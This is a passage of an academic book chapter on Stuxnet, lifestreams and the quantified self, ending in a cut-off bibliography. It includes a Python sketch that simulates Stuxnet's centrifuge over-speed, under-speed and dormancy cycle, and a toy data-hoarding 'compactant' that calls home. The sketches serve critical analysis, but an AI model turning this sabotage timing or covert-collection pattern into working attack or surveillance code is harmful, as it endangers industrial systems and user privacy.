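&lt;br /&gt;
NOMINAL_HZ = 1064 &lt;br /&gt;
ATTACKS = itertools.cycle([ &lt;br /&gt;
    (1410, 15 * 60),   # over-speed: 1,410 Hz, returned within 15 minutes &lt;br /&gt;
    (2, 50 * 60),      # under-speed: 2 Hz for 50 minutes &lt;br /&gt;
]) &lt;br /&gt;
DORMANCY = 27 * 24 * 60 * 60   # 27 days of doing nothing between attacks &lt;br /&gt;
&lt;br /&gt;
def set_frequency(hz): &lt;br /&gt;
    # stand-in for converter commands; Stuxnet also replayed recorded &lt;br /&gt;
    # sensor data so that operators saw nothing abnormal &lt;br /&gt;
    print('converter frequency set to', hz, 'Hz') &lt;br /&gt;
&lt;br /&gt;
for attack_hz, duration in ATTACKS: &lt;br /&gt;
    time.sleep(DORMANCY) &lt;br /&gt;
    set_frequency(attack_hz) &lt;br /&gt;
    time.sleep(duration) &lt;br /&gt;
    set_frequency(NOMINAL_HZ)&amp;lt;/pre&amp;gt; &lt;br /&gt;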
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm mean that at least thirty people would have had to work on it simultaneously to build it (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems and to deliver a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller (315) was designed to slowly reduce the speed of the rotors, leading to cracks and failures, and the second, larger warhead (417) manipulated valves in the centrifuge and faked industrial process control sensor signals by modeling the centrifuges, which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Hypotheses about Stuxnet's origin have been drawn from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic: taking the machine code, disassembling it, and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan -&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants show that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild, it is relatively trivial to decode it and, in a very short time, learn techniques that would otherwise have taken many years of development. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have grown in recent years as ‘real-time stream’ platforms like Twitter and Facebook have expanded. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, with its text-message-sized 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect his data systematically, starting in 1989. As he explains: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS location, direction, and so forth. At this point life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users who are active on the network. Indeed, activity streams have become a standard that is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed (a minimal sketch follows the definition below): &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
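To illustrate, here is a minimal sketch in Python of how such an activity might be encoded, loosely following the JSON serialisation described in the Activity Streams 1.0 specification (ActivityStreamsWG, 2011); all identifiers and values here are invented for illustration: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
import json &lt;br /&gt;
&lt;br /&gt;
# A minimal activity: an actor, a verb, an object, and a target. &lt;br /&gt;
# All names and identifiers below are illustrative, not from a real system. &lt;br /&gt;
activity = { &lt;br /&gt;
    'published': '2012-03-04T15:04:55Z', &lt;br /&gt;
    'actor': {'objectType': 'person', 'displayName': 'Geraldine'}, &lt;br /&gt;
    'verb': 'post', &lt;br /&gt;
    'object': {'objectType': 'photo', 'id': 'urn:example:photo:1234'}, &lt;br /&gt;
    'target': {'objectType': 'photo-album', 'displayName': 'Holiday Album'}, &lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
# Serialised, the activity can be transmitted, aggregated and searched. &lt;br /&gt;
print(json.dumps(activity)) &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;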
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case, in other words for the individual user (or lifestreamer) and for the organization (such as Facebook), the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or a population, group, or class of others.[13] &lt;br /&gt;
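&lt;br /&gt;
By way of example, a minimal sketch, assuming a simple numeric lifestream (a week of step counts, with all numbers invented), of the kind of comparison against a norm or historical data set described above: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
from statistics import mean &lt;br /&gt;
&lt;br /&gt;
# Invented example data: a week of step counts from a lifestream app. &lt;br /&gt;
user_steps = [4200, 5100, 3900, 8800, 4600, 5300, 4100] &lt;br /&gt;
group_norm = 6000  # hypothetical population average &lt;br /&gt;
&lt;br /&gt;
avg = mean(user_steps) &lt;br /&gt;
print('weekly average:', round(avg)) &lt;br /&gt;
print('deviation from group norm:', round(avg - group_norm)) &lt;br /&gt;
&lt;br /&gt;
# The same comparison can be made against the user's own history, &lt;br /&gt;
# or against an aggregate of some population, group, or class of others. &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;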
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, both in terms of providing steers for behaviour, norms and so forth, and in offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally amounts to the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives for the actor through a stabilising web of meaning.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs, in many ways, are life streams, albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: both their passive quality – under the surface, relatively benign and silent – and the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of compactness as conciseness in expression. The etymology from the Latin ''compactus'', closely put together or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003). &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, that is, to server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
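&lt;br /&gt;
A minimal sketch in Python may make this dichotomous structure clearer; the class below is a toy illustration of a compactant, not a description of any actual system: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
import json, time &lt;br /&gt;
&lt;br /&gt;
# A toy 'compactant': it passively collects events, aggressively hoards &lt;br /&gt;
# them, and periodically 'calls home' to offload processing elsewhere. &lt;br /&gt;
class Compactant: &lt;br /&gt;
    def __init__(self): &lt;br /&gt;
        self.hoard = []  # silently accumulated behavioural data &lt;br /&gt;
&lt;br /&gt;
    def observe(self, event): &lt;br /&gt;
        # passive mode: record without interrupting the user &lt;br /&gt;
        self.hoard.append({'t': time.time(), 'event': event}) &lt;br /&gt;
&lt;br /&gt;
    def call_home(self): &lt;br /&gt;
        # aggregation and visualisation are offloaded to the 'cloud' &lt;br /&gt;
        payload = json.dumps(self.hoard) &lt;br /&gt;
        self.hoard = [] &lt;br /&gt;
        return payload  # in a real system, an HTTP POST to a server &lt;br /&gt;
&lt;br /&gt;
c = Compactant() &lt;br /&gt;
c.observe('page_view') &lt;br /&gt;
c.observe('mouse_move') &lt;br /&gt;
print(c.call_home()) &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;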
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative relation to a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard, a relation that has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series structured streams of real-time data, often organised as lists. The past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are therefore often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
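&lt;br /&gt;
As a toy illustration of this temporal structure, consider a time-series stream organised as a list, where past entries are stored data, the head of the list is the present, and future entries are reminders or projections (all values invented): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
import time &lt;br /&gt;
&lt;br /&gt;
# Past entries are stored data, the middle entry is the present reading, &lt;br /&gt;
# and future entries address the 'future self' (all values invented). &lt;br /&gt;
stream = [ &lt;br /&gt;
    {'t': time.time() - 86400, 'kind': 'archive', 'value': 'run, 5 km'}, &lt;br /&gt;
    {'t': time.time(), 'kind': 'reading', 'value': 'heart rate 72'}, &lt;br /&gt;
    {'t': time.time() + 86400, 'kind': 'reminder', 'value': 'future self: gym'}, &lt;br /&gt;
] &lt;br /&gt;
&lt;br /&gt;
for item in stream: &lt;br /&gt;
    print(item['kind'], '-', item['value']) &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;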
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume 6, Number 1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
